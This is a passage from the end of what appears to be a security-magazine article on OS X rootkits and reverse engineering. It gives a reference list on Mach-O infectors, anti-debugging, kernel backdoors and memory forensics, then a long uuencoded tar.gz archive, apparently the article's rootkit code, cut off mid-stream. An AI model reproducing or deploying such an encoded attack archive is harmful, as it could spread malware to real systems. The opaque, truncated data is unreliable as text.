[11] fG!, Secuinside 2012, How to Start your Apple reverse engineering
     adventure, http://reverse.put.as/wp-content/uploads/2012/07/Secuinside
     -2012-Presentation.pdf

[12] fG!, Hitcon 2012, Past and Future in OS X malware
     http://reverse.put.as/Hitcon_2012_Presentation.pdf

[13] Jonathan Levin, Mac OS X and iOS Internals
     Wiley & Sons, 2012, ISBN: 978-1-11805765-0

[14] Amit Singh, Mac OS X Internals
     Addison Wesley, 2007, ISBN: 0-321-27854-2

[15] Apple, dyld 210.2.3 source code
     http://www.opensource.apple.com/source/dyld/dyld-210.2.3/

[16] fG!, Anti-debug trick #1: Abusing Mach-O to crash GDB
     http://reverse.put.as/2012/01/31/anti-debug-trick-1-abusing-mach-o-to-
     crash-gdb/

[17] Apple, Network Kernel Extensions Programming Guide
     https://developer.apple.com/library/mac/#documentation/Darwin/Conceptu
     al/NKEConceptual/intro/intro.html#//apple_ref/doc/uid/TP40001858-CH225
     -DontLinkElementID_70

[18] Apple, tcplognke
     http://developer.apple.com/library/mac/#/legacy/mac/library/samplecode
     /tcplognke/Introduction/Intro.html

[19] Gil Dabah, diStorm - Powerful Disassembler Library For x86/AMD64
     http://code.google.com/p/distorm/

[20] McKusick et al, The Design and Implementation of the 4.4BSD Oper.
     System, Addison Wesley, 1996, ISBN: 0-201-54979-4

[21] fG!, Av-monster: the monster that loves yummy OS X anti-virus software
     http://reverse.put.as/2012/02/13/av-monster-the-monster-that-loves-yum
     my-os-x-anti-virus-software/

[22] Apple, Technical Note TN2127
     https://developer.apple.com/library/mac/#technotes/tn2127/_index.html

[23] Cantrill et al, Dynamic Instrumentation of Production Systems
     dtrace_usenix.pdf

[24] Oracle, Solaris Dynamic Tracing Guide
     https://wikis.oracle.com/display/DTrace/Documentation

[25] fG!, Abusing OS X TrustedBSD framework to install r00t backdoors...
     http://reverse.put.as/2011/09/18/abusing-os-x-trustedbsd-framework-to-
     install-r00t-backdoors/

 [26] Andrew Case, Mac Memory Analysis with Volatility
      http://reverse.put.as/wp-content/uploads/2011/06/sas-summit-mac-memor
      y-analysis-with-volatility.pdf

 [27] FreeBSD, FreeBSD Handbook
      http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/audit-confi
      g.html

 [28] Der Flounder, OpenBSD auditing on Mac OS X
      http://derflounder.wordpress.com/2012/01/30/openbsm-auditing-on-mac-o
      s-x/

 [29] OpenBSDM Source Code
      http://www.opensource.apple.com/source/OpenBSM/

 [30] Apple, Kernel Programming guide
      https://developer.apple.com/library/mac/#documentation/Darwin/Concept
      ual/KernelProgramming/vm/vm.html#//apple_ref/doc/uid/TP30000905-CH210
      -BEHJDFCA

 [31] Halvorsen, Ole Henry & Clarke, Dougles, OS X and iOS Kernel
      Programming, Apress, 2011, ISBN-10: 1430235365

 [32] Hoglund, Greg & Butler, Jamie, Rootkits: Subverting the Windows
      Kernel, Addison-Wesley, 2005, ISBN-10: 0321294319

 [33] Luka Milkovic, Defeating Windows memory forensics, 29C3
      http://events.ccc.de/congress/2012/Fahrplan/events/5301.en.html

 [34] fG!, OS.X/Boubou  Mach-O infector PoC source code
      http://reverse.put.as/2013/03/05/os-xboubou-mach-o-infector-poc-sourc
      e-code/

 [35] thegrugq, How the Leopard hides his spots
      http://reverse.put.as/wp-content/uploads/2011/06/D1T2-The-Grugq-How-t
      he-Leopard-Hides-His-Spots.pdf

--[ 10 - T3h l337 c0d3z

begin 644 the_flying_circus.tar.gz
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
